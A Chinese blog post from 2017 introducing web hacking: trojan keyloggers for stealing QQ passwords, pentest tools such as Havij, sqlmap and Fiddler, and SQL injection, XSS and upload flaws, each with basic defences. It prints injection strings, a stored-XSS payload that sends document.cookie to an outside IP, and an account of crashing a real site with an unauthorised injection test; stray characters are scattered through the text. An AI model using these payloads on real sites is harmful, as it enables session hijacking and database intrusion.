“哇奈泪，做IT的”适贸，羨慕驚訝臉。

“嗯嗯......”涝桅，點(diǎn)頭自豪臉拜姿。

“會(huì)不會(huì)盜QQ？......”冯遂，期待臉蕊肥。

“......”，一臉懵逼蛤肌。

首先聲明一下壁却，不是所有的IT從業(yè)者都會(huì)盜QQ好么，IT領(lǐng)域那么廣裸准，術(shù)業(yè)有專攻嘛展东。就算是hacker也有不同的方向的吶。

那還是先來簡(jiǎn)單聊一聊怎么盜吧炒俱。盜QQ就是黑進(jìn)企鵝的數(shù)據(jù)庫(kù)然后查看密碼盐肃，游刃有余么？這未免想多了而且成本有點(diǎn)高权悟。

條條道路通羅馬恼蓬，盜QQ的手法很多種，我們先繞開釣魚頁(yè)面（一般做成中獎(jiǎng)消息登錄窗口）僵芹，仿造QQ登錄器（一般是網(wǎng)吧）处硬，破解QQ郵箱，密碼猜測(cè)等社工學(xué)手段拇派，就hack而言荷辕，比較經(jīng)典的手法就是上木馬。方式之一是需要先把木馬上到你的機(jī)器上（通過你點(diǎn)擊的文件件豌，鏈接或者網(wǎng)頁(yè)自動(dòng)植入安裝疮方，牛點(diǎn)的就直接攻電腦植入），注意這點(diǎn)很關(guān)鍵茧彤。當(dāng)你執(zhí)行登錄的時(shí)候記錄你的鍵盤密碼輸入按鍵行為骡显，然后把密碼通過木馬程序發(fā)送到對(duì)方的指定位置（比如郵箱）。整個(gè)過程就是這么簡(jiǎn)單，但指定QQ號(hào)不是今天說盜就能立馬盜的了的惫谤。

所以不明鏈接就別以為點(diǎn)下又不要錢就去瞎點(diǎn)了壁顶，還有特別是在網(wǎng)吧登QQ又不用軟鍵盤的你就等于是赤裸裸的在狂奔（當(dāng)然還有一種是直接檢測(cè)密碼記錄文件的，這種的就算使用軟鍵盤也是逃不過的）溜歪。

木馬程序哪里拿若专？怎么設(shè)置？自行搜索找資源了蝴猪，我也沒有调衰。^-^

聊完盜QQ我們進(jìn)入正題吧。閱讀以下內(nèi)容前默認(rèn)你已掌握一些基本的開發(fā)或者h(yuǎn)ack知識(shí)自阱。

每一位hacker都不可能僅僅只會(huì)某一種攻擊技術(shù)嚎莉。攻擊手段也多種多樣，諸如暴庫(kù)沛豌、弱口令攻擊趋箩、內(nèi)存溢出攻擊、注入琼懊、DDOS阁簸、XSS、旁注等等哼丈。不同目的使用不同的攻擊手法启妹，就比如攻擊主機(jī)和web站點(diǎn)是有區(qū)別的。但是只要能達(dá)到目的用什么手段都行醉旦，你扛著大刀架到目標(biāo)管理員脖子上要到密碼都算你贏（這在網(wǎng)安上應(yīng)該屬于社工學(xué)）饶米。

對(duì)于WEB站點(diǎn)滲透而言，通常情況攻擊流程為漏洞掃描车胡，滲透檬输，入侵，提權(quán)匈棘。當(dāng)然hack是一個(gè)無(wú)所不用其極的工種丧慈，隨機(jī)應(yīng)變，沒有固定公式可言主卫。

先掃描站點(diǎn)漏洞逃默，對(duì)掃描結(jié)果進(jìn)行滲透驗(yàn)證是否確實(shí)存在漏洞，大多工具誤報(bào)率還是蠻高的簇搅，確認(rèn)漏洞后執(zhí)行自動(dòng)攻擊或者手動(dòng)攻擊完域，很多工具都支持自動(dòng)攻擊，但是有些效果并沒有手動(dòng)好瘩将，就比如Havij的SQL自動(dòng)注入對(duì)SQL語(yǔ)句拼接都注不進(jìn)去吟税，看著它能把你氣死凹耙。一般入侵后上傳木馬后門，拿webshell肠仪，提權(quán)肖抱，完事。

下面分享幾款WEB網(wǎng)站滲透工具供學(xué)習(xí)使用藤韵，有些是比較老了虐沥，有些是安全測(cè)試人員還在用熊经，以下只分享使用心得泽艘，下載和教程有興趣的自行找資源哈，需要的可以交流镐依。必須提醒的是匹涮，使用前切記請(qǐng)先隱藏好自己（不是躲草叢），弄好代理或跳板槐壳，啊然低，呸，是先閱讀好黑客精神和法則务唐，以及遵守法律法規(guī)雳攘。

1.Safe3WVS

漏洞掃描工具，支持SQL注入枫笛，XSS跨站吨灭，上傳漏洞，潛在漏洞等的掃描刑巧，掃描效果還行喧兄。

免費(fèi)未破解版的只能支持SQL注入漏洞掃描碼，存在誤報(bào)啊楚。需要自行驗(yàn)證滲透吠冤。

上點(diǎn)圖搞點(diǎn)氣氛之Safe3WVS界面

2.Havij

是一款自動(dòng)化的SQL注入工具,它能夠幫助滲透測(cè)試人員發(fā)現(xiàn)和利用Web應(yīng)用程序的SQL注入漏洞。

比如我們從上面的1軟件掃描到SQL注入漏洞恭理，直接把地址抓過來拯辙，執(zhí)行自動(dòng)注入，如果可注入成功底部將得到數(shù)據(jù)庫(kù)的賬號(hào)和基本信息颜价。再進(jìn)一步可直接獲取表結(jié)構(gòu)涯保，表字段，列值拍嵌，一條龍入侵?jǐn)?shù)據(jù)庫(kù)遭赂，獲取管理員賬號(hào)迅速快捷。確實(shí)非常方便好用横辆，但是有一個(gè)不足撇他，上面說了茄猫，自動(dòng)注入有時(shí)候連SQL語(yǔ)句拼接的漏洞都搞不定。

上點(diǎn)圖搞點(diǎn)氣氛之Havij界面

3.Sqlmap

SQL滲透工具困肩，個(gè)人認(rèn)為最有效的工具划纽。但是使用起來相對(duì)Havij來說不是很方便，非可視化操作锌畸，直接在cmd上干勇劣，敲命令操作。由python開發(fā)而成潭枣，安裝需先安裝python比默。

4.Fiddler

Fiddler是一個(gè)http協(xié)議調(diào)試代理工具，它能夠記錄并檢查所有你的電腦和互聯(lián)網(wǎng)之間的http通訊盆犁，設(shè)置斷點(diǎn)命咐，查看所有的“進(jìn)出”Fiddler的數(shù)據(jù)（指cookie,html,js,css等文件，這些都可以讓你胡亂修改的意思）谐岁。

可以用來抓包（抓包還是挺好用的）醋奠，數(shù)據(jù)攔截分析，偽造數(shù)據(jù)報(bào)等伊佃。

當(dāng)然它的附帶插件很多支持XSS漏洞掃描：

X5s窜司，需手動(dòng)訪問各個(gè)頁(yè)面forms表單，然后手動(dòng)替換注入代碼驗(yàn)證漏洞航揉，不是很便捷塞祈，用起來累不死你。

Watcher迷捧，分析當(dāng)前URL包中存在安全漏洞問題织咧，顯示嚴(yán)重等級(jí)，當(dāng)然也包含XSS漏洞漠秋。

ccXSScan笙蒙，反射性XSS掃描，個(gè)人認(rèn)為沒什么效果的插件庆锦。

如果掃描到XSS漏洞直接可以payload捅位，上傳代碼（一般利用的是存儲(chǔ)型XSS漏洞），可執(zhí)行自己定義的站外代碼搂抒，如果COOKIE的會(huì)話標(biāo)識(shí)未受保護(hù)艇搀，即可直接劫持，用于模擬用戶登錄（原理下文詳解）求晶。

上點(diǎn)圖搞點(diǎn)氣氛之Fiddler界面

hack工具很多焰雕，以上就簡(jiǎn)單介紹這么多吧。還有諸如著名的管理工具菜刀（必須要配合上傳的木馬使用芳杏，但用起來確實(shí)好用）矩屁，DDOS工具LOIC（單部機(jī)器也只能算是個(gè)DOS）辟宗，毀滅壓力測(cè)試終極版（這個(gè)倒是真沒有用過，看過一個(gè)視頻效果還行吝秕，不過據(jù)說收費(fèi)版才有用）泊脐，敏感地址和后臺(tái)地址掃描工具御劍（必須依賴字典庫(kù)，感覺就像密碼暴破的密碼庫(kù)一樣烁峭，關(guān)鍵在庫(kù)）等經(jīng)典工具就不多說了容客。你可能認(rèn)為HACK就是這么簡(jiǎn)單，用幾個(gè)別人開發(fā)的工具點(diǎn)點(diǎn)就行了约郁，那就有點(diǎn)尷尬了缩挑，這只能說就是平時(shí)所說的腳本小子。不建議只做腳本小子棍现。

其實(shí)手注是一門更深的學(xué)問调煎，才是內(nèi)功镜遣。

什么己肮？上面那些都看不懂在干嘛？那簡(jiǎn)單看看幾個(gè)原理吧悲关。以下默認(rèn)你已掌握基本開發(fā)知識(shí)谎僻。

站在開發(fā)者的角度，對(duì)于WEB站點(diǎn)最通常也是最基本需要防御的安全漏洞：SQL注入寓辱，XSS艘绍，上傳漏洞，命令執(zhí)行注入秫筏，文件包含等等诱鞠。

1.SQL注入

現(xiàn)在存在SQL注入漏洞的應(yīng)該比較少了吧，大多數(shù)是比較老的站點(diǎn)这敬，過濾比較弱航夺。但是你拿工具去掃描一些站點(diǎn)，還是會(huì)報(bào)一大堆漏洞地址的崔涂，當(dāng)然誤報(bào)率還是挺高的阳掐。如果不爽就直接用1'? or? 1=1或者'or'='or'等類似語(yǔ)句拼接一試便知。

曾經(jīng)就對(duì)某站點(diǎn)做了這樣一個(gè)測(cè)試（還沒開始嘗試滲透）：

上點(diǎn)圖搞點(diǎn)氣氛之注入登錄提交

輸入1'? or? 1=1為用戶名點(diǎn)擊登錄之后站點(diǎn)就崩潰了冷蚂，懷疑是SQL語(yǔ)句拼接執(zhí)行了導(dǎo)致查詢?nèi)頂?shù)據(jù)資源耗盡導(dǎo)致缭保，最近是加上了驗(yàn)證碼（估計(jì)是以為被暴破了）。對(duì)輸入再次親測(cè)了下蝙茶，數(shù)據(jù)也已經(jīng)作了過濾處理艺骂，站長(zhǎng)的反應(yīng)還算蠻迅速的了。

原理大概就是隆夯，假如你寫了一段登錄判斷的用戶名密碼SQL查詢代碼如下：

$sql="select * from test where name='".$_GET['username']."'and password='".$_GET['password']."'";

正常執(zhí)行的語(yǔ)句是：

select * from test where name='lin'and password='123456';//查詢用戶名為lin密碼為123456的用戶钳恕。

如果注入成功孕锄，執(zhí)行的的是：

select * from test where name='1'or'1=1'and password='123456';//查詢用戶名為1或者密碼為123456的用戶。如果處理結(jié)果是取數(shù)據(jù)返回的第一條后果可想而知苞尝。非法登錄事小畸肆，聯(lián)表拿數(shù)據(jù)，獲取數(shù)據(jù)庫(kù)權(quán)限都只是時(shí)間問題宙址。

注入后拿webshell最簡(jiǎn)單流程：admin登錄轴脐，上馬，工具連接抡砂，拿到網(wǎng)站管理權(quán)限大咱。

防御的手段基本就是，參數(shù)一定要過濾注益，轉(zhuǎn)義碴巾，永遠(yuǎn)不要相信用戶輸入，還有注意不要直接拼接SQL語(yǔ)句〕笊Γ現(xiàn)在這種漏洞很少了厦瓢，就PHP而言其本身的自動(dòng)轉(zhuǎn)義還有一些框架的過濾和轉(zhuǎn)義做得很便捷了直接設(shè)置參數(shù)即可了。但這并不意味著就無(wú)孔不入了啤月，這只是基本的防線而已煮仇。

2.XSS

XSS反射型和存儲(chǔ)型，數(shù)存儲(chǔ)型比較好利用谎仲。只要無(wú)意點(diǎn)擊了事先植入的代碼就直接執(zhí)行了跨站代碼浙垫，任其魚肉，包括劫持COOKIE郑诺，模擬用戶登錄夹姥。其可以簡(jiǎn)單理解為：假設(shè)你的站點(diǎn)有一個(gè)評(píng)論表單提交，存在XSS漏洞辙诞，攻擊者提交window.open('http://10.65.110.110/getcookie.php?msg='+document.cookie)代碼提交辙售，之后只要任何用戶包括管理員訪問頁(yè)面點(diǎn)擊到了這塊隱藏代碼，直接會(huì)觸發(fā)請(qǐng)求http://10.65.110.110/getcookie.php?msg='+document.cookie倘要，目標(biāo)頁(yè)面代碼對(duì)接收的cookie獲取并記錄圾亏，完美劫持COOKIE，并使用代理抓包中斷攔截封拧，偽造cookie發(fā)送就可以無(wú)需密碼以被劫持的用戶身份登錄了志鹃。

大多數(shù)掃描工具只掃描反射型的，而且不是很好用泽西。不過手動(dòng)的話直接alert(123)一試便知曹铃。

最基本的防御就是過濾，編碼捧杉，PHP的htmlentities()函數(shù)html轉(zhuǎn)實(shí)體就很好用（入庫(kù)之前的處理）陕见，還要特別小心敏感標(biāo)簽和字符秘血。還需要提的一點(diǎn)是COOKIE的會(huì)話標(biāo)識(shí)很多站點(diǎn)都不是httponly的，如果站點(diǎn)不存在XSS漏洞還好评甜，如果存在的話那么這個(gè)直接就是COOKIE劫持的綠色通道呀灰粮，比較危險(xiǎn)。

什么意思呢忍坷？趕緊打開你的站點(diǎn)看看吧粘舟，如果你的站點(diǎn)COOKIE的會(huì)話身份標(biāo)識(shí)PHPSESSID（PHP默認(rèn)的是這個(gè)，名字是可改的）不為httponly佩研，那么恭喜你柑肴，只能提醒你小心草叢！

處理還是比較簡(jiǎn)單的旬薯，如果是PHP語(yǔ)言可以配置文件配置下即可晰骑，其他的語(yǔ)言環(huán)境類似。

上點(diǎn)圖搞點(diǎn)氣氛之Firefox查看httponly

3.上傳漏洞

最簡(jiǎn)單的就是上傳的文件判斷不夠嚴(yán)謹(jǐn)導(dǎo)致木馬進(jìn)入目錄绊序，被執(zhí)行硕舆，整站淪陷。PHPCMS早期的上傳漏洞很經(jīng)典了政模。

基本防御的話就是充分驗(yàn)證上傳文件的類型岗宣，上傳目錄不要給執(zhí)行權(quán)限。

還有DDOS攻擊防御雖然更傾向于運(yùn)維淋样，但個(gè)人覺得對(duì)于開發(fā)人員應(yīng)該也要懂得IPtables、負(fù)載均衡等這些最基本的防御降損策略吧胁住。這種不講道理的粗暴群毆向來比較難防趁猴，要成本，如果真遇上了彪见，還是多找找發(fā)起的根源吧儡司。當(dāng)然余指，先不必驚慌，抑或可能也許是有新手正拿你的站點(diǎn)練手或者壓測(cè)呢酵镜。^_^

使用阿里云的同學(xué)，只能說其自動(dòng)安全檢測(cè)很不錯(cuò)了淮韭，但完全依賴似乎也不行垢粮，機(jī)械化并且誤報(bào)較高~^~靠粪。網(wǎng)安養(yǎng)兵千日用兵一時(shí)毫蚓。就簡(jiǎn)單聊到這吧，網(wǎng)安其實(shí)是一個(gè)甚深的無(wú)底洞元潘，上文皮毛而已。分享是一種快樂君仆，也希望對(duì)有需要的朋友能有所幫助。有需要給幫忙作安檢的站點(diǎn)也可以扔過來交流哈袖订。

僅供用于技術(shù)學(xué)習(xí)，請(qǐng)遵循國(guó)家相關(guān)法律法規(guī)洛姑。

? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 2017.7.1